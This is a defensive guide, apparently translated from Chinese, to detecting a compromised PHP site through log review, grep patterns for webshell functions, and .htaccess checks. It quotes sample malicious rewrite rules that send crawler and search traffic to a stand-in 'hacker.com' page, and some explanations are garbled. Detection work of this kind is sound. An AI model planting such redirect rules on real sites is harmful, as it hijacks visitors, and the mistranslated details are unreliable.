Methods to detect if a PHP site has been compromised

0x01 View Access Log

See if there is a file upload operation (POST method),

IPREMOVED - - [01/Mar/2013:06:16:48 -0600] "POST/uploads/monthly_10_2012/view.php HTTP/1.1" 200 36 "-" "Mozilla/5.0"IPREMOVED - - [01/Mar/2013:06:12:58 -0600] "POST/public/style_images/master/profile/blog.php HTTP/1.1" 200 36 "-" "Mozilla/5.0"

The log format of the Nginx default record is:

Or

access_log logs/access.log combined;

The location of the default logging for Nginx is:

nginx安装目录/log/

0x02 to find files containing malicious PHP code

2.1 Finding recently changed PHP files

find . -type f -name ‘*.php‘ -mtime -7

-type F means a search for normal files-mtime-7 the files that are modified within the hour

The results may be as follows:

./uploads/monthly_04_2008/index.php./uploads/monthly_10_2008/index.php./uploads/monthly_08_2009/template.php./uploads/monthly_02_2013/index.php

2.2 Find out if there is a suspect code in the file

(* represents any space)

find . -type f -name ‘*.php‘ | xargs grep -l "base64_decode *(" --colorfind . -type f -name ‘*.php‘ | xargs grep -l "gzinflate *(" --colorfind . -type f -name ‘*.php‘ | xargs grep -l "eval *(str_rot13 *(base64_decode *(" --color

Note: Many commands do not support pipeline pass parameters, and actually need this, so use the Xargs command, this command can be used to pass parameters of the pipeline, Grep-l represents only the file name of a string, if you remove-l will display the line content matching a particular string

The meaning of several special strings: eval () executes the string according to PHP code, is the most common PHP word trojan

Base64_decode () decodes the string base64, payload is Base64 encoded when attacking, this function is useful.

Gzinflate () The string decompression processing, when the attack payload with gzdeflate compression, use this function to decompress

STR_ROT13 () encodes a string rot13

You can also use regular expressions to search for files to find code:

find . -type f -name ‘*.php‘ | xargs egrep -i "(mail|fsockopen|pfsockopen|stream\_socket\_client|exec|system|passthru|eval|base64_decode) *("

The following explains the functions commonly used by Webshell:

Mail (): Can be used to send spam messages to site users

Fsockopen (): Open a network connection or a UNIX socket connection that can be used to payload send remote requests

Pfsockopen (): Similar to Fsockopen ()

Stream_socket_client (): Establish a remote connection, as in the following example:

<?php$fp = stream_socket_client("tcp://www.example.com:80", $errno, $errstr, 30);  if (!$fp) {      echo "$errstr ($errno)<br />\n";  } else {      fwrite($fp, "GET / HTTP/1.0\r\nHost: www.example.com\r\nAccept: */*\r\n\r\n");      while (!feof($fp)) {          echo fgets($fp, 1024);      }      fclose($fp);  }  ?>

EXEC (): Command execution function

System (): With exec ()

PassThru (): With exec ()

Preg_replace () The regular expression is decorated by the modifier "E", the replacement string needs to be executed in accordance with PHP code before replacing it, and this situation also needs to be taken into account in this case, the following scan can be used:

find . -type f -name ‘*.php‘ | xargs egrep -i "preg_replace *\(([‘|\"])(.).*\2[a-z]*e[^\1]*\1 *," --color

0X03 Comparing code files

This situation requires a clean code, which is compared to the code being used. For example

diff -r wordpress-clean/ wordpress-compromised/ -x wp-content

The above example compares the wordpress-clean/and wordpress-comprised/two directories, and the wp-content/subdirectory in the directory does not compare

0X04 Search for writable directories

See if there are any suspicious files in this directory, the following script looks for a directory with permissions of 777 for PHP files

search_dir=$ (PWD) writable_dirs=$ (find $search _dir-type d-perm 0777) for dir in $writable _dirs do #echo $dir Find $dir-type f-name ' *.php ' done

Hackers often insert PHP code into a JPG file, so you should also query for JPG files when querying these directories:

find wp-content/uploads -type f -iname ‘*.jpg‘ | xargs grep -i php

Note:-iname indicates that the file name is case-insensitive grep-i also means case insensitive

0x05 Detecting IFRAME Tags

Hackers often do is to embed the IFRAME tag, so you can view the source code of the Web page, and search for the presence of an IFRAME tag, you can use the following command:

grep -i ‘<iframe‘ mywebsite.txt

For dynamically generated pages, you can use the FF live HTTP headers plugin to download to the source and find out if there is an IFRAME tag

0x06 find out if a sensitive string exists in the database

including%base64_%,%eval (%<, etc. mentioned above some of the key words

0x07 checking. htaccess file

If Auto_prepend_file and Auto_append_file are included, use the following command

find . -type f -name ‘\.htaccess‘ | xargs grep -i auto_prepend_filefind . -type f -name ‘\.htaccess‘ | xargs grep -i auto_append_file

Auto_prepend_file's role is to load the current script file before loading the PHP script auto_append_file the role of loading the current script file, then load the PHP script. If the hacker modifies the. htaccess file, you can load the malicious script that you want to load when you access the PHP script for the. htaccess directory.

The htaccess file can also be used to hijack the website traffic to the hacker's website,

RewriteCond %{HTTP_USER_AGENT}^.*Baiduspider.*$Rewriterule ^(.*)$ http://www.hacker.com/muma.php [R=301]

Redirect The visit of the Baidu Crawler to the hacker's website (contains http_user_agent and HTTP keywords)

RewriteCond %{HTTP_REFERER} ^.*baidu.com.*$ Rewriterule ^(.*)$ http://www.hacker.com/muma.php [R=301]

REDIRECT traffic from the Baidu search engine to the hacker's website (containing http_referer and HTTP keywords) in order to see if the site is being htaccess modified to cause traffic hijacking, you can use the following command when searching for. htaccess files:

find . -type f -name ‘\.htaccess‘ | xargs grep -i http;find . -type f -name ‘\.htaccess‘ | xargs grep -i HTTP_USER_AGENT; find . -type f -name ‘\.htaccess‘ | xargs grep -i HTTP_REFERER